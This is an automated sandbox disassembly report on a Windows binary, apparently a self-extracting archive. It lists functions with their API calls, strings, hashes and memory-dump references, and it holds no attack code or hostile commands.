                          • Opcode ID: 9a259150b16b69e4aa18ea43b451c802d4eb746e364579c885c2a22c1f01c53f
                          • Instruction ID: c524e6ad31372bb96402c5ccf0411296cabeadcea02f274aad1812fbd3a3c6d5
                          • Opcode Fuzzy Hash: 9a259150b16b69e4aa18ea43b451c802d4eb746e364579c885c2a22c1f01c53f
                          • Instruction Fuzzy Hash: DD31EF72A1020AABDF269F64DC41DEE7BA9EB45310F050168FC05DB251EB35CD50CBA0
                          Function 00389DBB Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                          Download Yara Rule
                          APIs
                          • GetDC.USER32(00000000), ref: 00389DBE
                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 00389DCD
                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00389DDB
                          • ReleaseDC.USER32(00000000,00000000), ref: 00389DE9
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: CapsDevice$Release
                          • String ID:
                          • API String ID: 1035833867-0
                          • Opcode ID: 7edbd62d32c751e7d209102ec194ae52d8626ecda572f11ad813ee601e33f72c
                          • Instruction ID: 7ae4902844fccde501fd9ec805709eb602f163020f8f6c5480f6fbab137934ab
                          • Opcode Fuzzy Hash: 7edbd62d32c751e7d209102ec194ae52d8626ecda572f11ad813ee601e33f72c
                          • Instruction Fuzzy Hash: 9DE0EC71986721ABD7221BA5BC0DB9B3B5CAB19712F054106F70596194DA704405CB94
                          Function 00392016 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                          Download Yara Rule
                          APIs
                          • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00392016
                          • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 0039201B
                          • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00392020
                            • Part of subcall function 0039310E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0039311F
                          • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00392035
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                          • String ID:
                          • API String ID: 1761009282-0
                          • Opcode ID: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
                          • Instruction ID: 7e99ff1237bb0085ba3e9c1dd9e75281b73c1ade7bcf73677e012bbccfe4b202
                          • Opcode Fuzzy Hash: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
                          • Instruction Fuzzy Hash: 93C048A8104E40F81C233AB222426BF0B441C62BC4BD360C2E8801F713EE060A1AE033
                          Function 00389F5D Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 224COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00389DF1: GetDC.USER32(00000000), ref: 00389DF5
                            • Part of subcall function 00389DF1: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00389E00
                            • Part of subcall function 00389DF1: ReleaseDC.USER32(00000000,00000000), ref: 00389E0B
                          • GetObjectW.GDI32(?,00000018,?), ref: 00389F8D
                            • Part of subcall function 0038A1E5: GetDC.USER32(00000000), ref: 0038A1EE
                            • Part of subcall function 0038A1E5: GetObjectW.GDI32(?,00000018,?), ref: 0038A21D
                            • Part of subcall function 0038A1E5: ReleaseDC.USER32(00000000,?), ref: 0038A2B5
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: ObjectRelease$CapsDevice
                          • String ID: (
                          • API String ID: 1061551593-3887548279
                          • Opcode ID: 3eb7509192bef932d10326e0ce2054ed228025073c8651540800076299c6c696
                          • Instruction ID: 5f9d768cc95577eabe0707b775571fb85a27504ed3dcecf71b41d553e4a51fde
                          • Opcode Fuzzy Hash: 3eb7509192bef932d10326e0ce2054ed228025073c8651540800076299c6c696
                          • Instruction Fuzzy Hash: 35812371208704AFD716DF28DC44A6ABBE9FF89704F00495EF98AD7260CB34AD05CB62
                          Function 00380E37 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: _swprintf
                          • String ID: %ls$%s: %s
                          • API String ID: 589789837-2259941744
                          • Opcode ID: b5ed9ebdb7af44200f5ff09ca4dcbde87eb563e4cd779537a2a7411991a45f61
                          • Instruction ID: 4c6718f11bc399b2dfd46327eb77fc8306e688a4d07aee4a1feeaeea91ad265e
                          • Opcode Fuzzy Hash: b5ed9ebdb7af44200f5ff09ca4dcbde87eb563e4cd779537a2a7411991a45f61
                          • Instruction Fuzzy Hash: 0251A67514CB00FAFA773AA4CD03F37766DAB14B00F208987B7DA78CD5C69265586712
                          Function 0037772B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138timeCOMMON
                          Download Yara Rule
                          APIs
                          • __EH_prolog.LIBCMT ref: 00377730
                          • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 003778CC
                            • Part of subcall function 0037A444: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0037A27A,?,?,?,0037A113,?,00000001,00000000,?,?), ref: 0037A458
                            • Part of subcall function 0037A444: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0037A27A,?,?,?,0037A113,?,00000001,00000000,?,?), ref: 0037A489
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: File$Attributes$H_prologTime
                          • String ID: :
                          • API String ID: 1861295151-336475711
                          • Opcode ID: 440bcdf93fb6a676f96786ea69b4a9f5913f7c4cceeae5e7b305af9faceb72a7
                          • Instruction ID: 279c50fe3d9df0d2aa813fc607dce298909ee4cd8913b5c2d8c44b699546a4de
                          • Opcode Fuzzy Hash: 440bcdf93fb6a676f96786ea69b4a9f5913f7c4cceeae5e7b305af9faceb72a7
                          • Instruction Fuzzy Hash: 73416171804258AADB36EB50CD56EEEB37CAF45300F00C19AB60DA7092DB785F84DF62
                          Function 0037B66C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID:
                          • String ID: UNC$\\?\
                          • API String ID: 0-253988292
                          • Opcode ID: 8112d5e76d8fbf9385b3c6e355b7f464b53c5e7a7f640b90c1acee02dfdd8745
                          • Instruction ID: 1fb9213ff35d46763e337a34872aa8722e174cc8a088a3d1851d6fb1fd129a4b
                          • Opcode Fuzzy Hash: 8112d5e76d8fbf9385b3c6e355b7f464b53c5e7a7f640b90c1acee02dfdd8745
                          • Instruction Fuzzy Hash: 3F417F35800299AACF33AF21DC41FEBB7BDAF45750B11C465F82CAB152E778DA45CA60
                          Function 00388FB6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 85COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID:
                          • String ID: Shell.Explorer$about:blank
                          • API String ID: 0-874089819
                          • Opcode ID: 59aad33e91ae2b7dd4a221aba7daa43d2b9c15d4999e2989ab5d77cb49ea04d6
                          • Instruction ID: 207143da2658f6756d7373f1e10bbf9236fab3680134a55a2c7e2f6cc7e9c645
                          • Opcode Fuzzy Hash: 59aad33e91ae2b7dd4a221aba7daa43d2b9c15d4999e2989ab5d77cb49ea04d6
                          • Instruction Fuzzy Hash: FC2165712143049FCB0ABF64D895B7A77A9FF45711B1985AEF9099F282DB74EC00CB60
                          Function 0038D44D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 70COMMON
                          Download Yara Rule
                          APIs
                          • DialogBoxParamW.USER32(GETPASSWORD1,0001045C,0038A990,?,?), ref: 0038D4C5
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: DialogParam
                          • String ID: GETPASSWORD1$xj<
                          • API String ID: 665744214-1985457453
                          • Opcode ID: 3842af73d4477cd2da378127822d50177bd30310cb40d3dea5239b2e960c3118
                          • Instruction ID: bd44ca13405f21cf34d2a584e0766c4070cf9f2c70bb8f87c3afc39c60598ecd
                          • Opcode Fuzzy Hash: 3842af73d4477cd2da378127822d50177bd30310cb40d3dea5239b2e960c3118
                          • Instruction Fuzzy Hash: 941126716143486BDB23EE359C02BEB379CB70A315F0581A6FE49AB191CBB4AC40D760
                          Function 0037EBF2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0037EB73: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0037EB92
                            • Part of subcall function 0037EB73: GetProcAddress.KERNEL32(003B81C0,CryptUnprotectMemory), ref: 0037EBA2
                          • GetCurrentProcessId.KERNEL32(?,?,?,0037EBEC), ref: 0037EC84
                          Strings
                          • CryptProtectMemory failed, xrefs: 0037EC3B
                          • CryptUnprotectMemory failed, xrefs: 0037EC7C
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: AddressProc$CurrentProcess
                          • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                          • API String ID: 2190909847-396321323
                          • Opcode ID: aa18c22e62c41cfb1d6bceda658b819f0552751b98be4e9f2679057f3b332f6c
                          • Instruction ID: f62d501dd977ac4a259e579db2f07cad33a679157be7351afdbe951f053965a9
                          • Opcode Fuzzy Hash: aa18c22e62c41cfb1d6bceda658b819f0552751b98be4e9f2679057f3b332f6c
                          • Instruction Fuzzy Hash: 20113635A056266BDB279B24DD46AAE3B1CEF09714F05C199F80A6F281CB399E418BD0
                          Function 00399B90 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: _free
                          • String ID: X:
                          • API String ID: 269201875-423137811
                          • Opcode ID: bed15e9ef23a4a0d12705658354d886b4f0b6b582186202d3e636ebb1a75281d
                          • Instruction ID: 2918fe2830375114d9f3f69b7ce2d1ac21d0e74f7463831180f447f19e07f093
                          • Opcode Fuzzy Hash: bed15e9ef23a4a0d12705658354d886b4f0b6b582186202d3e636ebb1a75281d
                          • Instruction Fuzzy Hash: BE119871B02611ABEF229B7CBC41B5637D9AB55730F160A2BF521CF1D0E7B5D8418680
                          Function 0038EC4A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0038F25E
                          • ___raise_securityfailure.LIBCMT ref: 0038F345
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: FeaturePresentProcessor___raise_securityfailure
                          • String ID: 8=
                          • API String ID: 3761405300-956260198
                          • Opcode ID: 6a5b1e36070da0639525bb9ee7af7791c30d6838d7bfebefa322179e91fb4f11
                          • Instruction ID: e833ab16c1d8a4cc2f6db0e886a07a63b2b34553fde14cb263aca5a831fc9334
                          • Opcode Fuzzy Hash: 6a5b1e36070da0639525bb9ee7af7791c30d6838d7bfebefa322179e91fb4f11
                          • Instruction Fuzzy Hash: EC2137B9912B048FD75AEF64F9817547BADFB49B10F10582BE9088B3B0E3B19980CF45
                          Function 00380889 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
                          Download Yara Rule
                          APIs
                          • CreateThread.KERNEL32(00000000,00010000,003809D0,?,00000000,00000000), ref: 003808AD
                          • SetThreadPriority.KERNEL32(?,00000000), ref: 003808F4
                            • Part of subcall function 00376E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00376EAF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: Thread$CreatePriority__vswprintf_c_l
                          • String ID: CreateThread failed
                          • API String ID: 2655393344-3849766595
                          • Opcode ID: 4dca462a0a42b396bc961a3e0ccc6689d3fe2d7cc68d95700aab6a157f331435
                          • Instruction ID: 771b05c7fe0cdbd25c9aa4e05f22b6a5ffbd051b96901cc0253b87c6796de8dc
                          • Opcode Fuzzy Hash: 4dca462a0a42b396bc961a3e0ccc6689d3fe2d7cc68d95700aab6a157f331435
                          • Instruction Fuzzy Hash: 5201D6B53443056FE62BBF54EC86BA67398EB41715F10046DF68696180CAA1A8849764
                          Function 0039B2AE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00398FA5: GetLastError.KERNEL32(?,003B0EE8,00393E14,003B0EE8,?,?,00393713,00000050,?,003B0EE8,00000200), ref: 00398FA9
                            • Part of subcall function 00398FA5: _free.LIBCMT ref: 00398FDC
                            • Part of subcall function 00398FA5: SetLastError.KERNEL32(00000000,?,003B0EE8,00000200), ref: 0039901D
                            • Part of subcall function 00398FA5: _abort.LIBCMT ref: 00399023
                          • _abort.LIBCMT ref: 0039B2E0
                          • _free.LIBCMT ref: 0039B314
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: ErrorLast_abort_free
                          • String ID: :
                          • API String ID: 289325740-3499768093
                          • Opcode ID: 7e00ec678ab44ed84a460fe2b0066b866b8ef69b480ed84a02812a74fecd14da
                          • Instruction ID: 881155996e94f758a74b92915c0b281ee3899ec315d618eb7d65ec0dac4bf9a9
                          • Opcode Fuzzy Hash: 7e00ec678ab44ed84a460fe2b0066b866b8ef69b480ed84a02812a74fecd14da
                          • Instruction Fuzzy Hash: 2C019236D11625DFCF23EF59A94125EF364FF5AB21F1A060AE4606B681CB306D418FC2
                          Function 0037130B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0037DA98: _swprintf.LIBCMT ref: 0037DABE
                            • Part of subcall function 0037DA98: _strlen.LIBCMT ref: 0037DADF
                            • Part of subcall function 0037DA98: SetDlgItemTextW.USER32(?,003AE154,?), ref: 0037DB3F
                            • Part of subcall function 0037DA98: GetWindowRect.USER32(?,?), ref: 0037DB79
                            • Part of subcall function 0037DA98: GetClientRect.USER32(?,?), ref: 0037DB85
                          • GetDlgItem.USER32(00000000,00003021), ref: 0037134F
                          • SetWindowTextW.USER32(00000000,003A35B4), ref: 00371365
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: ItemRectTextWindow$Client_strlen_swprintf
                          • String ID: 0
                          • API String ID: 2622349952-4108050209
                          • Opcode ID: a189d27414b7e5b60bc0c29e3f8d58b2265a1c322ca340faba80fbcae011737e
                          • Instruction ID: ab1f79822b886bb371bfd08e752f4a95eb90bf098b88ea9f208dae0845dac721
                          • Opcode Fuzzy Hash: a189d27414b7e5b60bc0c29e3f8d58b2265a1c322ca340faba80fbcae011737e
                          • Instruction Fuzzy Hash: 1DF08C3A10024CAAEF770F689809BEA3BA8BF21705F09C018FD5D549A1C77CC995EE10
                          Function 0038084E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
                          Download Yara Rule
                          APIs
                          • WaitForSingleObject.KERNEL32(?,000000FF,00380A78,?), ref: 00380854
                          • GetLastError.KERNEL32(?), ref: 00380860
                            • Part of subcall function 00376E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00376EAF
                          Strings
                          • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00380869
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                          • String ID: WaitForMultipleObjects error %d, GetLastError %d
                          • API String ID: 1091760877-2248577382
                          • Opcode ID: f0f8d5a269880bef440033bed0087bc7be8b81f063d07ea4182d979f1b4be55e
                          • Instruction ID: ed443eef50e4754bfe945db68b11e475842cee5fc85bd5354df206aaffba5826
                          • Opcode Fuzzy Hash: f0f8d5a269880bef440033bed0087bc7be8b81f063d07ea4182d979f1b4be55e
                          • Instruction Fuzzy Hash: F8D05E35A086212ACA273764AC0BEEF7A099F53730F204714F23E691F5DB25099186E6
                          Function 0037DA4E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleW.KERNEL32(00000000,?,0037D32F,?), ref: 0037DA53
                          • FindResourceW.KERNEL32(00000000,RTL,00000005,?,0037D32F,?), ref: 0037DA61
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
